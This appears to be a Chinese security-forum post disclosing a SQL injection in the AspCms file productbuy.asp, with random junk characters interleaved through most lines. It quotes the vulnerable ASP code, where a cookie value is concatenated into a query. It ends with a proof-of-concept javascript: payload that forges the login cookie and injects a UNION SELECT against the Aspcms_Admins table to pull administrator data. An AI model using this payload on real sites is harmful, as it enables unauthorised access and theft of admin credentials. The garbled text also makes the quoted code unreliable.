好久没上土司了,上来一看发现在删号名单内.....
8 D" E0 [8 T: F D# }/ m也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。5 T% G+ t% F1 P& V
废话不多说,看代码:2 z2 Z; t3 V x6 a# C/ x. s
3 I6 r5 g! G9 B<%' f+ ^0 C; q3 R" d( @/ x3 v
5 \( z5 P! z* Xif action = "buy" then6 A" ]. z: q0 G* J1 H. q
# _4 M6 v: m- P: N addOrder()2 z/ z& ?9 n Z4 c, e" P8 s C
/ k- u% B6 X1 S; V9 @else
. E! ]) I# F) V, f1 a' c+ r; o
0 j+ y; m+ a4 d, G" H echoContent()
6 h9 k2 m0 U8 q! e' z' n2 R, y
5 b. v o# u& b8 e6 yend if
2 U; z. f/ n2 [1 ?
/ X7 x' w4 q5 N; K& ~* d: W% `: {& i6 o* Q1 L7 {- `
S+ V4 T( E7 W" ^! ~: \……略过, {1 {9 _ K) D6 t+ p$ S
) {2 \0 D: i, [) y: g4 l7 P% q6 X4 W) R" x9 k
4 P$ h9 S( G8 L1 Y4 U0 o) b( S6 Z/ b
Sub echoContent(), W/ y" j8 n+ z3 p) C" h' Y
$ k/ r% _, c5 |; l
dim id0 T2 k/ |% J2 G5 p! t( S7 r
$ S( x K! z9 T id=getForm("id","get")
' p0 j9 ]; L" |, Q! p1 ^- F3 M2 u/ Q# q# i/ S" t
9 n/ f7 {; C: {
2 q" p: U# h: S3 X0 U/ ~ if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1" 5 P1 ?! p. P3 H1 f4 J% |9 i s! Y
" ` `2 F5 q' K* ?; S- b B
5 K+ y$ O7 Q9 i1 t3 V3 ~+ ]% Y4 p3 e4 I! F, H+ X: |; A
dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")
" K; t: @( t2 O* U
! c* [- S4 Z$ }: }! |: f dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct; a" x2 Q' G4 u$ y7 O# T. T
4 v% u+ Z9 Z9 E7 X Dim templatePath,tempStr
9 ?; Z* h$ l3 B5 _* C! H- P4 R q' w& a( f6 {
templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"
1 H4 `: U" o# F8 E8 ~1 G' `6 l% M. ^ |4 B# }, r- f
+ l$ `4 z" B! Z/ \ U* B( S k' t4 g ^+ G/ m' a
set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")' t( X" u2 a; h" u* s% U: f
# m5 X$ L5 C4 v I; I selectproduct=rsObj(0)% Y, q" x- x* D+ [5 T& Q/ i4 E: o; B
$ c0 t; V7 I4 R/ \+ L2 {; w3 K+ J3 e
% w( @' u' q+ S
& X8 V2 t) B; F$ |
Dim linkman,gender,phone,mobile,email,qq,address,postcode
3 Z1 i+ N# o# N! a3 ~0 M3 m6 m* |" C! e' O& |
if isnul(rCookie("loginstatus")) then wCookie"loginstatus",0
! n$ K; |( R7 h& U3 k3 _! ~
- B Y$ L J4 G+ f. D& w if rCookie("loginstatus")=1 then
& ^% t3 } T3 @# }7 u
; b+ e N8 _! h- Y* j+ M/ d set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1"): ] c1 q7 r7 K7 X. ^6 t# b }
* |+ k9 L, F/ D7 X \/ D2 a
linkman=rsObj("truename")
7 d) u4 ]- G* q6 i) s! m1 w9 A& B/ o
gender=rsObj("gender")
! J0 f, H/ P* K( X! C( D
7 m0 h' @- O! c5 q' Z/ q( r& B phone=rsObj("phone")
9 r; o7 C, d4 s, s Z) o o1 @) J5 I( w: h
mobile=rsObj("mobile")
7 Z( M8 Q1 l0 Z
) D; @' v9 ~$ ]1 [6 H( ?6 l D1 [1 X email=rsObj("email")' _3 l% W9 l3 ?0 Q$ ~' `) p8 e
9 E, M1 u u3 h) z9 U1 F+ K' o4 F
qq=rsObj("qq")$ b; D* O0 Q. M9 k# w" w: G
) c% a9 j, _3 K) ?
address=rsObj("address")
3 x+ B. y3 Q6 |; z9 _ c2 N' G6 ]$ j; N
postcode=rsObj("postcode")
5 d2 E& |3 y; T; I0 b3 s$ o$ H- E: h
else
& T3 \2 T$ {6 C. n- ~+ c8 i: U! j6 P" Y% ] Q! h
gender=1
9 O+ _# D& U6 v {) s5 w& v" N, ^6 F1 d0 N" m0 A& @( G
end if7 M& z J/ p" U4 a! T" |% m' _
& ?9 v2 Y7 N5 g* l3 z' g rsObj.close()% I M0 B2 d+ |% j% a
1 E- n3 u+ n0 X5 j+ b' x
* B; L, m$ |# o9 c! U$ n% q# T+ _
/ Z& Q( e2 v/ ]( p: R L6 G/ q with templateObj
( j1 |( B+ v2 z& o( |+ h' i- k2 \
; I4 h3 r( F9 Z .content=loadFile(templatePath)
& J; U+ q, b; U' a1 ~1 J$ K; r1 n; L$ D/ q# M2 m/ D
.parseHtml()
$ m) M6 E) a+ P! O8 Z
# L3 q0 C$ Y% b* W" u0 v .content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)
/ j8 @ ~9 u# w) \+ N9 B* T1 u$ ~& N7 L, O- q, c; Y9 P/ {, e
.content=replaceStr(.content,"[aspcms:linkman]",linkman) 1 a4 L4 }7 | m+ m2 q
T/ p3 T" u2 x; N, L .content=replaceStr(.content,"[aspcms:gender]",gender) % {6 L+ Q8 E( j D3 s
. a( C$ U( W" Y% N8 z3 R2 G, F .content=replaceStr(.content,"[aspcms:phone]",phone) . n2 `/ i& Q3 F
- L& k& S. e4 U/ }1 x .content=replaceStr(.content,"[aspcms:mobile]",mobile) 8 J# R5 u2 ?" i, `) o
- f9 {1 `# _2 N/ c9 t0 A' s .content=replaceStr(.content,"[aspcms:email]",email)
0 ~3 c( F$ I- q0 S! r0 f$ k1 f$ U
. M3 l* a9 Q9 M* j* p .content=replaceStr(.content,"[aspcms:qq]",qq) 4 u2 k0 E- a# N
7 ]) D1 T. p, b' k. w/ i
.content=replaceStr(.content,"[aspcms:address]",address) & C1 w! E5 w/ q
# @) J, s7 m8 ~0 [) n7 X! R .content=replaceStr(.content,"[aspcms:postcode]",postcode)
3 r! V. U) u# G" z8 C, R& z7 o
) \1 F$ }; z5 N6 Y0 g6 R .parseCommon() ' @ F0 D% |2 k. d5 O$ d
# O1 W& W4 M8 B H8 \4 ]
echo .content
$ K+ a! P; I3 k* J# f! P8 P' l$ @# r# L6 t2 e
end with
% R, W: i3 s6 _! l5 l! ` m
% R N2 y6 R# P3 d1 a" P set templateobj =nothing : terminateAllObjects
. s8 r1 e$ m6 g& ^" d4 D, v; I: V- p5 ^2 \
End Sub! `2 F4 U" \; R7 R8 D% [4 A
漏洞很明显,没啥好说的
# d7 _+ D- h R6 s7 \: t8 Q+ mpoc:
( s$ Y( G% B3 d! X' i
: ~- W! j3 b2 B* B5 \javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子
, G( u) ^( `/ O' @! v/ @2 X' M
6 M0 t$ v. U* Q5 O6 O6 o |